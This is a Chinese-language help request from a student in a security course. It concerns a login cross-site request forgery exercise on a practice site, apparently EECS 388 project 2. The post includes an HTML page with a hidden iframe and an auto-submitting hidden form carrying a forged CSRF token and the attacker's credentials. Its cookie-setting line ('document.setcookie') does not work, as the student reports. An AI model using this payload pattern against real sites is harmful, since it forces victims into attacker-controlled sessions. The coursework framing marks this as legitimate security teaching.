在我的安全课程中,我们被告知在本网站上使用firefox练习xss攻击;
http://permalink.co/
不用担心,这是一个专门为我们设置安全性的网站。您看到的csrf字段应设置为1(对于令牌验证,令牌是随机的),并且对于此练习,xss字段应设置为0。我们应该编写一个html文件并包含其他语言,如javascript,这样当我们的文件由浏览器执行时,它应该只显示一个空白页面。但是当刷新时,它应该表明我们登录了上面提到的网站。用户名是'attacker,密码是'l33th4x'。
我基本上需要锁定密码,用户名和令牌。我想出了一个使用cookie并将令牌设置为'abc'的计划。所以,当我登录时,我使用我知道的用户名和密码,我知道设置了令牌= abc。但是我的代码不起作用,我被告知我需要两种形式,第一种用于将cookie令牌设置为'abc',第二种用于使用三个参数登录。但我不知道在第一种形式中放什么。我想出了下面的代码,但它不起作用,我需要帮助;
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title> set csrf to 0 and xss to 4 on http://permalink.co/ </title>
</head>
<body>
<iframe style="border:none;width:0px;height:0px" id="iframe_submit" name="iframe_submit"></iframe>
<form id="form_id" action="http://permalink.co/login" method="POST" target="iframe_submit">
<input type="hidden" name = "csrf_token" value="abc"><br>
<input type="hidden" name = "username" value="attacker"><br>
<input type="hidden" name = "password" value="l33th4x"><br>
</form>
<script type="text/javascript">
document.setcookie="csrf_token=abc";
document.forms["form_id"].submit();
</script>
</body>
</html>
有关问题的第一手资料,请访问以下网站并查找编号2.1。这是在上个月到期,但我不理解,考试即将来临; https://www.eecs.umich.edu/courses/eecs388/static/388-w15-proj2.pdf